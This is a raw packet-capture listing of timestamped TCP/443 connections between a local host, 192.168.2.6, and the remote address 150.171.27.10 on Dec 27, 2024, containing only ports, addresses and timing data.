                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.263432980 CET44349732150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.263448954 CET44349732150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.263525963 CET49732443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.263534069 CET44349732150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.263580084 CET49732443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.264578104 CET44349733150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.264600039 CET44349733150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.264641047 CET49733443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.264656067 CET44349733150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.264697075 CET49733443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.264718056 CET49733443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.264910936 CET44349732150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.264966011 CET49732443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.264971018 CET44349732150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.264992952 CET44349732150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.265017986 CET49732443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.265043974 CET49732443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.265211105 CET49732443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.265223980 CET44349732150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.265228987 CET49732443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.265271902 CET49732443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.265554905 CET44349733150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.265621901 CET49733443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.265625954 CET44349733150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.265669107 CET44349733150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.265697002 CET49733443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.265726089 CET49733443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.266184092 CET49733443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.266192913 CET44349733150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.275917053 CET44349731150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.275938034 CET44349731150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.276014090 CET49731443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.276026964 CET44349731150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.276293993 CET49731443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.325671911 CET44349731150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.325697899 CET44349731150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.325747967 CET49731443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.325761080 CET44349731150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.325804949 CET49731443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.325815916 CET49731443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.331165075 CET44349730150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.331188917 CET44349730150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.331259966 CET49730443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.331269979 CET44349731150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.331270933 CET44349730150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.331291914 CET49730443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.331294060 CET44349731150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.331331015 CET49731443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.331338882 CET44349731150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.331358910 CET49731443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.331365108 CET49730443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.331382036 CET49731443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.337990046 CET44349731150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.338013887 CET44349731150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.162688971 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.162750006 CET49739443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.178754091 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.178775072 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.178867102 CET49739443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.178878069 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.178929090 CET49739443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.193780899 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.193797112 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.193890095 CET49739443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.193901062 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.193953037 CET49739443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.209989071 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.210007906 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.210057974 CET49739443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.210072041 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.210112095 CET49739443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.210133076 CET49739443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.322808027 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.322830915 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.322880030 CET49739443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.322894096 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.322932005 CET49739443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.322951078 CET49739443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.333226919 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.333246946 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.333292007 CET49739443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.333302021 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.333344936 CET49739443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.344554901 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.344575882 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.344633102 CET49739443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.344641924 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.344681978 CET49739443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.344717979 CET49739443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.355628967 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.355644941 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.355735064 CET49739443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.355745077 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.355807066 CET49739443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.365258932 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.365274906 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.365353107 CET49739443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.365361929 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.365407944 CET49739443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.377064943 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.377084017 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.377159119 CET49739443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.377168894 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.377325058 CET49739443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.386665106 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.386688948 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.386763096 CET49739443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.386770964 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.386821032 CET49739443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.386838913 CET49739443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.397646904 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.397670031 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.397749901 CET49739443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.397758961 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.397825003 CET49739443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.523329973 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.523351908 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.523451090 CET49739443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.523467064 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.523513079 CET49739443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.531701088 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.531721115 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.531835079 CET49739443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.531843901 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.531912088 CET49739443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.539062977 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.539078951 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.539139986 CET49739443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.539148092 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.539191961 CET49739443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.547528982 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.547548056 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.547627926 CET49739443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.547636986 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.547672987 CET49739443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.547687054 CET49739443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.555891037 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:22.555908918 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.137800932 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.137841940 CET49739443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.145751953 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.145781040 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.145865917 CET49739443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.145879984 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.145922899 CET49739443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.153949022 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.153968096 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.154015064 CET49739443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.154023886 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.154042006 CET49739443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.154066086 CET49739443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.161094904 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.161111116 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.161185026 CET49739443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.161191940 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.161237955 CET49739443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.169302940 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.169318914 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.169390917 CET49739443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.169398069 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.169444084 CET49739443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.170552969 CET44349746150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.170629025 CET49746443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.176955938 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.176971912 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.177052021 CET49739443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.177058935 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.177109957 CET49739443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.185044050 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.185059071 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.185106993 CET49739443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.185113907 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.185144901 CET49739443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.185159922 CET49739443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.193250895 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.193267107 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.193521023 CET49739443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.193527937 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.193578005 CET49739443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.205957890 CET44349749150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.206063032 CET49749443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.279728889 CET49745443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.279751062 CET44349745150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.280205011 CET49745443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.280210018 CET44349745150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.328526020 CET49746443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.328535080 CET44349746150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.339335918 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.339354992 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.339430094 CET49739443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.339440107 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.339484930 CET49739443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.340573072 CET49746443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.340579987 CET44349746150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.343466043 CET49749443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.343501091 CET44349749150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.343873978 CET49749443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.343888044 CET44349749150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.347464085 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.347480059 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.347565889 CET49739443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.347565889 CET49739443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.347574949 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.347616911 CET49739443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.355506897 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.355524063 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.355691910 CET49739443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.355699062 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.355743885 CET49739443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.362668037 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.362688065 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.362750053 CET49739443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.362756968 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.362798929 CET49739443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.370899916 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.370917082 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.370981932 CET49739443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.370989084 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.371032000 CET49739443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.378495932 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.378513098 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:23.378580093 CET49739443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:24.175127983 CET44349749150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:24.175251007 CET49749443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:24.192812920 CET44349746150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:24.192822933 CET44349746150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:24.192881107 CET44349746150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:24.192890882 CET49746443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:24.192914963 CET44349746150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:24.192935944 CET49746443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:24.192964077 CET49746443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:24.197104931 CET44349749150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:24.197201014 CET49749443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:24.197211027 CET44349749150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:24.197350025 CET49749443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:24.226439953 CET44349749150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:24.226515055 CET49749443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:24.226526976 CET44349749150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:24.226571083 CET49749443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:24.229417086 CET44349746150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:24.229439974 CET44349746150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:24.229509115 CET49746443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:24.229521990 CET44349746150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:24.229948044 CET49746443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:24.260896921 CET44349746150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:24.260915995 CET44349746150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:24.260968924 CET49746443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:24.260977983 CET44349746150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:24.261023998 CET49746443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:24.261043072 CET49746443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:24.262645960 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:24.262681007 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:24.262779951 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:24.263520002 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:24.263535976 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:24.297450066 CET44349746150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:24.297467947 CET44349746150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:24.297544956 CET49746443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:24.297554970 CET44349746150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:24.297602892 CET49746443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:24.351632118 CET44349745150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:24.351669073 CET44349745150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:24.351708889 CET49745443192.168.2.6150.171.27.10
